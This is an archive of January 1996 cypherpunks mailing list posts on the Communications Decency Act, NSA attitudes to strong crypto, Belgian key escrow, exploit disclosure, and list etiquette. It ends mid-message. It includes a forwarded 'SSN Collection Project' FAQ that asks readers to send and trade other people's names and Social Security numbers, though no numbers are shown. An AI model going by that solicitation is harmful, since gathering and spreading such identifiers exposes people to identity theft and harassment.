>>     http://www.cdt.org/policy/freespeech/12_21.cda.html
>> 
>>     This title may be cited as the "Communications Decency Act of 1995".
>> 
>>     Perhaps some of our more lawyerly types can decipher whether
>>     it is getting better or worse as the conference committee chews.
>>     Not I.
>> 
>
>I'm not a lawyer,

No kidding.

> but from what I've read from the WWW site above, it
>seems that only providing "indecent" materials to minors is prohibited.
>I think this is already illegal.

No.  For example, the San Francisco Chronicle can be sold or given to minors
without restriction and yet it has published the word "fuck" on several
occasions.  This is considered "indecent" but not obscene.  Likewise other
newspapers, magazines, and books.  The Supremes have upheld time, place, and
manner restrictions on over-the-air broadcast of indecent material (The
Seven Words You Can't Say on Television), but these restrictions do not
apply to cable or even to broadcast later at night.   

>Broadcasting or sending unsolicited "indecent" materials is also 
>prohibited, but that seems to have always been the case (except that 
>objectionable materials have been called "obscence" rather than "indecent").

Obscene is different from indecent.  What Congress is attempting to do is
apply conventional broadcast TV and radio regulation to the Internet and
other computer networks in spite of the fact that they are not like those
systems and in any case those systems are supposed to be in the process of
being deregulated themselves. 

>There are provisions, as I read it, that protect electronic 
>intermediaries from the acts of the actual publishers of the materials 
>(i.e. an ISP is not responsible for the material of other internet sites
>not under their control).

But the protections are phony because ISPs have to bend over backwards to
block their systems from being used to transmit indecent material.  It just
deputizes them as cops.

DCF

"Frankly, my Dear.  I don't give a damn." -- Indecency, 1939 style.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 10 Jan 1996 00:52:54 +0800
To: gaffney@emba.uvm.edu>
Subject: Re: S.652 (H.R. 1555)
In-Reply-To: <Pine.3.89.9601091009.F11357-0100000@griffin.emba.uvm.edu>
Message-ID: <wkwdZSi00YUvI3q_gr@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 9-Jan-96 Re: S.652 (H.R. 1555) by
Don Gaffney@emba.uvm.edu 
> I'm not a lawyer, but from what I've read from the WWW site above, it
> seems that only providing "indecent" materials to minors is prohibited.
> I think this is already illegal.

Fortunately, that's not true. Now, I'm anything but a lawyer, so I
welcome corrections. My understanding is:

* INDECENCY is illegal to *broadcast* under Federal law, as enforced by
the FCC. Examples of indecent words include "fuck" and "cocksucker,"
which the Supreme Court has defined as illegal in the George Carlin
speech, Pacifica case. The justification for a compelling government
interest is that radio waves are pervasive, and a child can turn on the
radio and hear dirty words by accident. The great free speech attorney
Harvey Silverglate has been representing Alan Ginsberg in an "indecency"
case, since "Howl" contains "indecent" words -- I believe he managed to
get the FCC to include an exemption for material broadcast after
midnight.

* OBSCENITY is illegal to *distribute* under state laws, which usually
incorporate the Miller test. That is, material which has no redeeming
artistic, scientific, educational, or political value is obscene. (There
are some excemptions, including university libraries. The ACLU has
argued that in that context, Usenet can be considered a library.) In
practice, text is not obscene; only bestiality and heavy BDSM pix are.

> It sounds to me like the only real task posed is to authenticate those
> accessing questionable materials as being >= 18 years old. Hmmmm. Don't
> authentication & crypto go hand-in-hand?

If you're running a public web site or anon FTP site, how do you do
that? And should you have to?

Anyway, the current telecom bill language continues to include the
"indecency" language. Since there are no post-midnight exemptions, it
means the Internet would be the most regulated communications medium in
the United States. 

What does that mean? When this becomes law, you'll be hit with fines of
$250,000 and prison terms of two years if you post the word "fuck" in a
Usenet newsgroup or on a web page where a minor can read it.

Fuck that.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 10 Jan 1996 23:22:42 +0800
To: cypherpunks@toad.com
Subject: SSN collection prank
Message-ID: <199601091945.LAA18379@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I haven't seen this here. somewhat amusing.

------- Forwarded Message


Date: Sun, 7 Jan 1996 19:49:14 -0500 (EST)
From: Brad Dolan <bdolan@use.usit.net>
To: snet-l@world.std.com
Subject: (fwd) Private SSN Collection Project <cool!> (fwd)



- - ---------- Forwarded message ----------
- - ---------- Forwarded message ----------
Date: Sun, 31 Dec 1995 00:01:48 -0800
From: Clint Danbury <danbury@shell.wco.com>

Thank you for your response.

Please send Full names and Social Security Numbers of anyone you know,
including government officers and/or employees, to: 

Clint Danbury, 
Box 750037, 
Petaluma, CA 94975-0037

email: danbury@ssnShirt.com


Questions And Answers On The Nationwide SSN Collection Project.


- - -1-	Why are you collecting SSNs ?

Answer: For fun and amusement.  


- - -2-	What do you plan to do with them ?

Answer: Put them on sweatshirts and sell them through specialty
clothing retailers.  It has been suggested also that I post them on
large billboards along the Mexican border, but I don't have enough
capital to pull of such a stunt at this time.


- - -3-     How long do you intend to continue this ?

Answer:   Until it becomes illegal.  The moment any legitimate
government authority informs me of the specific laws which (A) Forbid
the collection, recording, and distribution of SSNs by private parties,
and (B) Provide legal recourse for the individual citizen against
private parties which do so, I will stop.


- - -4-     What if the government finds out what you're doing ?

Answer:    First off, the government knows very well what I'm doing.
I've been "reported" multiple times to the SSA and the Secret Service.
Secondly, the government can find me quite easily (I'm in the phone
book).  Third, I will cooperate completely with any legitimate
government authority.


- - -5-     Here's my ex-spouse's SSN; will you make him/her miserable for
	me ?

Answer:   Hell No ! If you want me to engage in illegal activity for
you, then go somewhere else !


- - -6-     Isn't what you are doing illegal ?

Answer:   Not according to the SSA.  They have declared the private use
of the SSN unrestricted.  (More on this in a few questions)



- - -7-     If My name/SSN were in your database, would you tell me ?

Answer: In order for me to confirm this, you must first tell me what
your full name and SSN is, then I will tell you if you were already in
there.  If this sounds like two-faced hypocrisy, great!  I got the idea
from CBI-Equifax; that's their very own policy.  If you don't tell them
what your SSN is, they won't tell you what they've got on you.
Therefore, I have decided to do the exact same thing.  (If you don't
believe it, then why don't you call them and ask for yourself?)


- - -8-     What if someone did the same thing to you ? How would YOU feel
?

Answer:  This already has  happened to me.  I told the SSA office about
it, repeatedly, and they would take no action.  (The story appears in
the next answer.)


- - -9-     How did this all start ?

Answer:    In 1985, a co-worker learned that I object to the
"Uni-Number" concept of identifying a single person across multiple
databases.  I was (and still am) specifically concerned about the use
of the SSN for Non-Tax identification.  The company placed our SSNs on
our name tags, which, thankfully, we did not have to wear constantly,
although we would occasionally have to display it for a guard during
certain times.

This co-worker went poking through my briefcase while I was out of my
office, copied down my SSN, and then, for his own fun and amusement
(I'm guessing at his motives, I don't know his true reasons) displayed
it for me, and would not tell me where he got it.  Seeing that this
angered me, he then went to other co-workers, who joined him in making
my SSN even more public.  They then went to the personnel files, (which
the company made no attempt to keep locked) and double-checked the
number with my job application.  After that, they memorized it, and,
(again, I'm guessing here) for their own amusement, they would recite
it in unison around the lunch table.  (I know this sounds impossible,
but it really did happen.)

After that job ended (not very happily, surprise) I let myself cool off
for a few months, and then moved to another city.  During my time in
that other city, I contacted the SSA office there, seeking another
SSN.  I made dozens of phone calls and wrote letter after letter, all
to no avail.  My letters got shorter and to-the-point, not long drawn
out things.  It took only 30 seconds to read them.  This continued for
several months.

The result was always the same: words without action, and no
replacement SSN.

The company in that city went down the tube, and I had to move again.
I wrote and called off-and-on over the next few years, and got the same
treatment; empty words, stall-him-off, and they would make no statement
one way or the other.

In September of 1993 (perhaps an earlier date, I'm not sure) the SSA
finally came out and gave their official written approval for
unrestricted use of the SSN by private individuals and private
organizations for any purpose, including fun and amusement.  The
pamphlet is entitled "Your Social Security Number", is SSA Publication
05-10002, and dated September/1993.  You can get a copy by calling them
at 1-800-772-1213.

On page 9 of that pamphlet, they have finally removed all restrictions
on the private use of the SSN and they've put it in writing...

"Because there is no law concerning the use  of a person's Social
Security number by a  private individual or organization, Social
Security has no control over such use."

So, if those are the rules they've made, fine.  Those are the rules by
which I'll act.  The collection and distribution of other people's SSNs
is (as you've just read) a legally unrestricted activity and that's
exactly what I'm doing.


- - -10-    Where do you get the SSNs ?

Answer: "...there is no law..." so, just like CBI, TRW, TU, et.al., I
don't have to tell you where I got yours.  Ask CBI where they got your
SSN; they won't tell you, and neither will I.


- - -11-    How do you check for accuracy ?

This question bothered me a lot at first, however, it has become
astoundingly simple to check whether a number is accurate or not.  So,
just exactly how do I do this ?   CBI doesn't have to tell, and neither
do I.  "...there is no law..."


- - -12-    How can I get a copy of your list ?

Answer: Unfortunately, I have found the drones to outnumber the
worker-bees by a factor of about 10-to-1.  This is not the
soup-kitchen, it's a group project.  If you want SSNs from me, then I
want SSNs from you.  In the past, I offered a 1-for-1 exchange.  I will
no longer make that public offer.  What is offered is this: If you will
send me full names and SSNs of prominently elected officials,
media-babes, et.al., then I will (to the extent my database allows)
send you back full names and SSNs of other prominent politicians and
media babes, 1-for-1 if I can.  Of course, full names and SSNs of any
individual or group are still welcome, they just don't qualify for the
1-for-1 offer.

				Copyright, 1995 by Clint Danbury



           (Better Living Thru Better Living)                    
 **************************************************************************
 X        SNAIL ME         +      GABRIELLI'S (Mendocino,CA, USA)         0
 X      YER ROSEHIPS       +                                              0
 X IF YOU LIKED THIS POST! + *Pinot Noir* & *ASCENZA* (WHITE-BLEND)-YUMMY!0
 **************************************************************************
            [Ask Fer  "Mendocino,Ca. -- *Gabrielli Wine*"  at 
	           yer local wine shop if'n ya
		    want to tend yer rugosa]

	Let your voice be heard in the campaign to save the life of
	 		     Mumia Abu Jamal
             ++++ more info: http://www.calyx.com/ ++++







- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 10 Jan 1996 01:04:29 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: NSA says strong crypto to china??
In-Reply-To: <199601071037.EAA00310@proust.suba.com>
Message-ID: <199601091649.LAA11718@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alex Strasheim writes:
> If this is true, it's great news.  It would mean that the NSA is adopting
> both cypherpunk analysis and tactics.  Who would have thought?  An NSA 
> remade in Tim May's image.

I suspect that the NSA was thinking in our terms long before many of
us were aware of cryptography. I actually think that in many cases,
their behavior is perfectly rational. Their goals are merely
different. If you are in SIGINT, I believe that the possibility of
totally losing a valued intelligence tool must heavily weigh on your
mind. Of course, they are hardly monolithic, and different groups at
the NSA necessarily have different goals.

Once SIGINT becomes much harder regardless of their previous attempts
to stop it, I suspect that the NSA will become a friend and not an
impediment. By that time, of course, the "we have to protect our
people" types will be the only ones producing results and getting
funding, and the "we have to gather information" types will have long
ceased to produce. Thats probably a decade or more off, though.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 10 Jan 1996 01:12:48 +0800
To: Gordon Campbell <campbelg@limestone.kosone.com>
Subject: Re: please stop the Mitnick stuff
In-Reply-To: <2.2.32.19960107165924.0068f9e0@limestone.kosone.com>
Message-ID: <199601091651.LAA11733@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Gordon Campbell writes:
> >When there are one or two small items posted on a topic thats no big
> >deal. When its a lot of stuff, it becomes an enormous pain. Multiply
> >the few seconds to read and digest enough of a message to know you
> >should delete it by dozens of messages per mailing list per day and by
> >a dozen mailing lists and you suddenly have an untenable waste of your
> >time.
> 
> I con't recall you speaking up against the various flame wars that have been
> going on in here lately, Perry.

Thats because I largely send people private mail. I try not to nag in
public. Just because you don't see me say "this is irrelevant" doesn't
mean I didn't notice.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Dahlgren <kent@trouble.WV.TEK.COM>
Date: Wed, 10 Jan 1996 04:15:24 +0800
To: "James A. Donald" <jamesd@echeque.COM>
Subject: Re: Microsoft continues to mislead public about Windows security bugs (a bit long, with references)
In-Reply-To: <199601090802.AAA13049@blob.best.net>
Message-ID: <Pine.SUN.3.91.960109114625.1204C-100000@trouble>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 8 Jan 1996, James A. Donald wrote:

> >
> > Is anybody listening?
> 
> They will listen if you start to release full uncrippled exploits, after
> a reasonable delay.
> 
I agree.  It all comes down to money, as you all know.  Do you think the 
bean counters and lawyers at MS see it proitable to announce such a 
obvious problem, no doubt running the risk of being unfavorably depicted 
in the ignorant mass media as offering a product that is "insecure?"  We 
all know what the responcible thing to do is.  I suspect marketing has a 
hand in quelling the idea of announcing this problem.  That's why I agree..
to a point.
______________________________________________________________________________
______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______
                      /
 Voice: 1.800.835.6100             E-mail: support@colorprinters.tek.com
    Fax: 1.503.685.3063                WWW: www.tek.com
     BBS: 1.503.685.4504            E-World: Keyword Tektronix
      HAL: 1.503.682.7450                AOL: Keyword Tektronix
   Service: 1.800.835.6100                FTP: ftp.tek.com
______________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 10 Jan 1996 09:51:07 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: NSA says strong crypto to china??
In-Reply-To: <199601091649.LAA11718@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.960109115034.27854B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


> Once SIGINT becomes much harder regardless of their previous attempts
> to stop it, I suspect that the NSA will become a friend and not an
> impediment. By that time, of course, the "we have to protect our
> people" types will be the only ones producing results and getting
> funding, and the "we have to gather information" types will have long
> ceased to produce. Thats probably a decade or more off, though.

I doubt this will ever happen.  If strong cryptography is ever deployed
worldwide ubiquitously, which is a big if, passive ether sniffing becomes
much harder, but the SIGINT people will likely switch to active attacks. 
Defense against active attacks is much more difficult than against passive
attacks, and requires a host of technologies besides strong crypto (the
one we're lacking most, I think, is a good software engineering
methodology).  I bet the NSA is doing active research on sniffer viruses
and other automated tools for large scale active attacks. 

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 10 Jan 1996 01:37:35 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Still [NOISE] but a.f.urban was clearly wrong [Fwd: Re: ABOI: Desperate User Support])
In-Reply-To: <Pine.ULT.3.91.960108172827.24082E-100000@Networking.Stanford.EDU>
Message-ID: <199601091717.MAA31459@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<sigh> my second white noise message on the same thread:

rich writes:
> You should know better than to believe everything you read in
> alt.folklore.urban, even the debunking. 
> 
> There was a brief Libyan-backed coup in Trinidad & Tobago in July 1990.
> Here are a few Reuters headlines in reverse chronological order, courtesy
> of Lexis/Nexis. I also recall a couple of excellent articles in The
> Economist.
> 
> I believe that the Symantec story has at least some truth to it. 
> 
> I don't read alt.folklore.urban, so I won't post there, but someone should.

OK, Rich succeeded in irritating me with some facts ;} so I went to the
trouble of doing an Alta Vista search for "trinidad" and "supermac". I think
you will find this archived response informative:
	http://rampages.onramp.net/~mdmiller/complain.htm

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPKi/inaAKQPVHDZAQHcwAf+OrcUYUm7oB/Jany8NXRu8SiFlifEsKxA
S2EngRDyg6WZsrnpCbh7dGv0PXpxnogUQzhTRcTXPYaDyr5k3zvwNd4+0Oqk/qXL
DPcCkGcwi456vPpMKQyTjFZlyO46uXgJA/ITTJciPvvxuC1X1/TK2Yq8Twb/5HBH
6jil5A5Jo0mJ+p4gKYT0hkgDA5JRncElgGJUl7W5A1qzZlp6FLmoNr+V7FLv04oz
7LiXUmiHiOSK/302u5M6gi231rra3DJ+JijtGHiesF4pVP46bJf5psWVzSTvpsKG
UtI+Gr7oo3aetltwICKvRG/YC/Gny7Vo6q6NMwccgFqpRbaKwdSN6g==
=SzRB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: berkley@ixl.net
Date: Wed, 10 Jan 1996 02:03:40 +0800
To: Don Gaffney <gaffney@emba.uvm.edu>
Subject: Re: S.652 (H.R. 1555)
Message-ID: <v01510102ad17fae052c6@[199.173.178.217]>
MIME-Version: 1.0
Content-Type: text/plain


Earlier today (Mon, 8 Jan 1996), you (Don Gaffney) expressed the following:

>I'm not a lawyer, but from what I've read from the WWW site above, it
>seems that only providing "indecent" materials to minors is prohibited.
>I think this is already illegal.

It is _not_ currently illegal, as the term "indecent," in all its
vagueness, can be defined as anything from a "Bonnie's Busty Barnyard
Buddies" video, to _Catcher in the Rye_, which has been deemed "indecent"
by several of this nation's local legislative bodies.

>Broadcasting or sending unsolicited "indecent" materials is also
>prohibited, but that seems to have always been the case (except that
>objectionable materials have been called "obscence" rather than "indecent").

And that is EXACTLY the point. You'll notice that the passage (I believe)
in question:

        "(B) by means of a telecommunications device knowingly -

        "(i)  makes, creates, or solicits, and
        "(ii) initiates the transmission of, any comment, request,
        suggestion, proposal, image, or other communication which is obscene
        or indecent knowing that the recipient of the communication is under
        ^^^^^^^^^^^
        18 years of age regard less of whether the maker of such communication
        placed the call or initiated the communication;

goes deliberately beyond simply "obscene." Which means that if I were to
send my 17 year-old cousin a digitized copy of some "indecent" song lyrics
or possibly even information on the AIDS epidemic, I am now facing felony
charges from los federales.

>There are provisions, as I read it, that protect electronic
>intermediaries from the acts of the actual publishers of the materials
>(i.e. an ISP is not responsible for the material of other internet sites
>not under their control).

It seems... But if I let my friendly neighborhood service provider know I'm
sending my cousin the electronic copy of Charles Bukowski's "Septegenerian
Stew" he requested, no doubt we're both doomed. (...knowingly permits a
telecommunications facility under his control to be used for any activity
prohibited by paragraph (1) with the intent that it be used for such
activity)

>It sounds to me like the only real task posed is to authenticate those
>accessing questionable materials as being >= 18 years old. Hmmmm. Don't
>authentication & crypto go hand-in-hand?

No question it is one of them, but the questionable materials are being
defined too broadly.

>Anyway, being rather foolish I suppose, I don't exactly see what the big
>deal is - am I missing something???

Along the same freedom of speech lines, the pending legislation also would
make it illegal to use a telecommunications medium to express anything
"obscene, lewd, lascivious, filthy, or indecent, with intent to annoy,
abuse, threaten, or harass an other person;" meaning if I sent e-mail to a
spamming "Get Rich Quick-er" telling him to fuck off, I am now in violation
of the CDA. The real bitch is that they can continue spamming (IMO, a worse
crime) as I rot away in Lemon Creek Correctional Facility; however, I am
not about to propose legislation to limit their ability to do that, either.

There is also the matter of allowing the FCC to regulate the internet,
which I find equally as disturbing, but I am sure there are people on this
list who will be able to express concerns with this far more eloquently
than myself.

Sincerely,

Angus Durocher.


____________________________
It should be an outrage for \_ Angus Durocher
people who have never seen a  \_ No one of much importance
road to be so presumptious as   \_ berkley@ixl.net
to regulate those of us who drive.\________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 10 Jan 1996 02:14:50 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] The LOGIC of Navigator 2.0 ?
In-Reply-To: <Pine.BSD.3.91.960109014646.1237C-100000@ahcbsd1.ovnet.com>
Message-ID: <199601091756.MAA31007@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

James M. Cobb writes:
>   That message quoted a couple of paragraphs from a Bloomberg news 
>   agency newsstory.  The story is headlined, Netscape Will Release 
>   an Updated Internet Browser in Two Weeks.  The story's datelined 
>   Mountain View CA. 
[...]
>   You posted your message via Best Internet Communications Inc in 
>   Mountain View CA... 
>  
>   Whatever the significance of that may be, 

As Perry has patiently pointed out time and again, this is not 
"conspiracypunks". In this case, I expect you might even get laughed off
alt.conspiracy. Don't post this silliness here.

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPKsJCnaAKQPVHDZAQGRkQf/afMIAN7jcBZFb7mN2OH/d8FtzX7qWvIx
0hYiWw6pK3d8S/4hDzPNrr5ORyNmW7xWfZ0VrU3Oqryvj6dvRVGbCk99dO+8jTQd
qiJohvOm9OiYBLG4raoqWTnF0eBw3COnKs1qS4Jk9rr1SfFYJYAtBXYMH9NjcgwU
qocrhXPdvltcF2piQqZwzWvKvR7IZmp6jF1UzbuL5HDabtr3qi3B2qjAJuf22/UM
866RQGUrBUNOTSoDbTOWJ4eP8GKseqFIEEJGBA44rhwGm8VOwrZIPNqCdUgi8Qaj
rSrPkJbXKGg/2N0WkuQHIjR+bJhdkmHcN2ksqNU0qTdYUPWszEIpZQ==
=Gl7W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 10 Jan 1996 03:56:12 +0800
To: cypherpunks@toad.com
Subject: Don't type: "g**d t*m*s v*r*s"
Message-ID: <ad180444000210042513@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:35 PM 1/9/96, Kent Dahlgren wrote:
>God...are we going to have to endure this like we have had to endure that
>stupid g**d t*m*s v*r*s e-mail crap? Let it die.  Let it die.

I have edited the name of this virus so as to minimized its damage. I read
that even _typing_ the phrase "g**d t*m*s v*r*s" in its full form can cause
the information stored in the phrease "g**d t*m*s v*r*s" to unpack itself,
install itself on all types of disk drives, and then initialize the disks.

I hope we caught it in time!

(More seriously, I notice that "alt.folklore.suburban@c2.org" was in the
distribution list for the message I'm replying to (pared out by me on this
message). I really hope that this does not mean what I think it means, that
"alt.folklore.suburban" is not being copied! The cross-contamination of
many mailing lists is one thing, but cross-contaminating our mailing list
and Usenet groups would truly be the work of the Army of the Twelve
Monkeys.)

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 10 Jan 1996 02:40:29 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A little skepticism over $60 billion
In-Reply-To: <199601091428.JAA16977@pipe9.nyc.pipeline.com>
Message-ID: <199601091811.NAA31069@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

SF Examiner writes:
# NEW YORK U.S. companies will lose as much as 30 percent of the $200  
# billion in U.S. computer system sales expected 

tallpaul writes:
> Now we know that U.S. companies will lose something off the government's
> anti-export policies. But will we really see 30% of sales lost by
> purchasing agents saying "Gee, we'd like to buy IBM mainframe's and Dell
> micros and Windows and unix but we won't because there is no secure
> encryption program in the world that will run on the IBM or U.S. micros or
> under the U.S. OS's"? 
>  
> Let's fight the export laws over exporting quality crypto without accepting
> advertising hype from any industry. 

First of all, Bill S. was suggesting that the $60B figure is too low 
to be convincing to certain crucial people. Arguing that the figure should 
probably be even lower can only lend weight to that argument.

Secondly, as I'm sure you'll agree, mass media reports and advertising can
sway public opinion. IMHO cypherpunks should not hesitate to use those tools
to further our cause. Putting a specific number, almost any number, on the
anticipated opportunity cost drives the point home with a lot of people. Now
most reasonable people know (I think) that projections are based on 
assumptions that turn out to be partially wrong, for various reasons. But
they still form useful premises for debate. (I have the current U.S. federal 
budget battle in the back of my mind here.)

Futplex <futplex@pseudonym.com>  (in a verbose mood, inexplicably)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPKvwSnaAKQPVHDZAQGbkAf+MINM93dSp5wSpd7w0A7qnSu4JQgQhcXS
22TaRnd4vUtVs/EK/qpdVwTrYuVwmaaTX99OLHjIJkYrbFOeU8KReXhS787/66dg
8LDqehcz2OW0eueo96lDMUD6HD9cmOrNkZHwTOuCrlCJTg7pVT5Y4dGADgRruVVN
Ll9FULAOWqw2Ks6g4xgrtTFxrlIX2pCKJIyfsD1m2fbxZucNqUTVxYYTG22fq8no
V5tLSog8zxkzawHXTdtjkxaFlt+jvwZJUZRjynT8T9UJB522LJnvJAEWS2cgdw1W
cOiRdNZv5Y4Se4cJasMO62G5ipSeWMjw3F2ADfmWIrUr2eYdKpOyCA==
=K4KN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Wed, 10 Jan 1996 02:47:42 +0800
To: perry@piermont.com
Subject: Why I think the NSA should love Strong Crypto
Message-ID: <v02130505ad1819a06beb@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Perry writes:
>Once SIGINT becomes much harder regardless of their previous attempts
>to stop it, I suspect that the NSA will become a friend and not an
>impediment.

Well, I often think that institutions and their desire to maintain their
funding can lead to strange decisions. On one hand, doing everything to slow
the emergence of strong crypto allows the NSA to continue to vaccuum up
signals from the world.

That would seem to justify their existence. But there are many people who
can do this without the assistance of the NSA. The FBI has a crack team. I'm
sure every agency can learn to snoop on phone calls. The US Forest Service,
for instance, is meeting plenty of resistence out in the American West. I
wouldn't be surprised if they have their own internal security unit that has
developed the ability to do this.

Now, imagine a world with plenty of strong crypto everywhere. Suddenly,
cracking messages is a very tough job that requires plenty of computer power
and high-powered mathematicians. The Forest Service can't order that up from
the Police version of Toys-R-Us. Even the FBI's relatively sophisticated
team isn't ready for it. It just takes plenty of investment of time and
education.

That's why I say that Strong Crypto is really in the NSA's best interest.
They haven't had a worthy adversary since the Soviet Union fell apart.

But I'm just a wise guy.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 10 Jan 1996 02:57:00 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: DNow2> Re: DNow2 Re: Hammill 1987 speech
Message-ID: <199601091824.NAA31073@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Greetings to all from someone on the cypherpunks list.

Please don't crosspost threads on cypherpunks + other mailing lists. This
thread, in particular, has essentially nothing to do with cypherpunks at
this point. Please eliminate cypherpunks@toad.com from the cc: on future
responses. Thanks.

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPKyuinaAKQPVHDZAQFoYQf+PKbtkD4P5SmV0JchrkMNvKWfGXLik1mW
/0WkUXTZ8rENwozWkrh3cUmzmR0YoMJBLAlJvmcJuzPVIpz8rjTLMhbp2VPeuQct
9/eTT7DOUqrekL0QWzlZP24wMYiHhTQEsMtbKlI3PT55ZMu95L4PJscZsdVG6OQY
cX7rJD2xbLYcaxRF04KKm8ajltieDmTmH3/Lk3AOnnB/HFn5ZArCam5PJcWvXFWg
kdPQjlW+iUFT+5kuXny5Jug9PTXL37zW8z9OBsKXMGARdeV8vDFiV8HX/ge4SAie
qWpgPfuMqHXZbCc1doQdOMv1iuWCUhQH0f2azkNG6UiPurVxqwnCYg==
=JcyK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lvhove@vnet3.vub.ac.be (Leo Van Hove)
Date: Tue, 9 Jan 1996 21:27:44 +0800
To: cypherpunks@toad.com
Subject: Belgium has 'key escrow' law
Message-ID: <v01530500ad17e84af074@[134.184.16.171]>
MIME-Version: 1.0
Content-Type: text/plain



Surprise, surprise.  Today's issue of 'De Standaard', Flanders' most
respected newspaper, reports that - much to everybody's amazement - Belgium
has a key escrow law in working order - or almost...

The newspaper states that certain articles of a much 'broader' law that was
passed on the 21th of December 1994, if enforced - which to date has _not_
been the case, would imply that encryption of computer messages is illegal
unless the private key is registered with the BIPT (the Belgian Institute
for Postal services and Telecommunication; a government administration that
regulates the telecom sector).

At the time of enactment these articles went almost completely unnoticed -
hence the amazement.  As mentioned, said articles are not enforced yet but
it now appears that a working group, called Belinfosec (Belgium Information
& Security), led by a colonel of the military intelligence services - no
less, is preparing a report which would contain further specifications and
would propose enacting clauses.

Note that at present there is already legislation up and working that
enables Belgian law enforcement to tap telephone lines 'in specific
circumstances' (i.e., suspicion of criminal or terroristic activities).
Judging by the newspaper article it will not be long before this will
include computer messages.

Asked for a reaction, officials from the banking sector reacted with both
disbelief and outrage.  The article quotes the head of security at Banksys
(the interbank consortium that operates Belgium's nation-wide
ATM/POS-network) who considers it to be "unacceptable" and "an intrusion on
privacy" if government authorities  were to be able to monitor all the
money flows that pass through the Banksys network.  He also fears that once
revealed to the authorities, the keys might fall into the wrong hands, thus
jeopardizing the system's security.

I'll try to find out more and keep you informed.

Ciao,

leo

P.S. I'm not on the cpx mailing list, so please Cc me.


_________________________________________________________________________
Leo Van Hove

Centre for Financial Economics
Vrije Universiteit Brussel (Free University of Brussels)
Pleinlaan 2
B-1050 Brussels
Vox: +32 2 629.21.25
Fax: +32 2 629.22.82
e-mail: lvhove@vnet3.vub.ac.be

VUB's Web site: http://www.vub.ac.be
_________________________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 10 Jan 1996 04:14:01 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Can you break my encryption protocol ?
In-Reply-To: <Pine.3.89.9601091514.A24844-0100000@unicorn.com>
Message-ID: <199601091954.OAA31373@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mark writes:
[description of threat model elided]
> Client and server both have copies of a passphrase, of any length.
> 
